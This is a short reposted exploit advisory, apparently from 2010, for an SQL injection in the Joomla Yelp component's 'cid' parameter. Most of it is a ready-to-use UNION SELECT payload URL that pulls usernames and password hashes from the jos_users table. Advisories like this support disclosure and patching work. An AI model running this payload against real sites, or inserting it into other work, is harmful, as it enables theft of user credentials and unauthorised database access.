Joomla (Yelp Component) SQL Injection Vulnerability
2010-02-09 10:15:48 作者:root 来源: 浏览次数:0
网友评论 条
[~]>> ...[BEGIN ADVISORY]...
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
[~]>> ...[BEGIN ADVISORY]... |
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
[~]>> TITLE: Joomla (Yelp Component) SQL Injection Vulnerability |
[~]>> RESEARCHER: B-HUNT3|2 |
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com |
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
[~]>> DESCRIPTION: Input var cid is vulnerable to SQL Code Injection |
[~]>> AFFECTED VERSIONS: N/A |
[~]>> IMPACT: Execute Arbitrary SQL queries |
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
[~]>> http://server/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=[SQL] |
[~]>> http://server/index.php?option=com_yelp&controller=showdetail&task=showdetail&cid=-1+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a3a3a,username,password),5,6,concat_ws(0x3a3a3a,username,password),8,9,10,11,12,13,14,15,16,17+FROM+jos_users-- |
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! |
[~]>> ...[END ADVISORY]... |
[收藏]
[打印] [关闭]
[返回顶部]
已有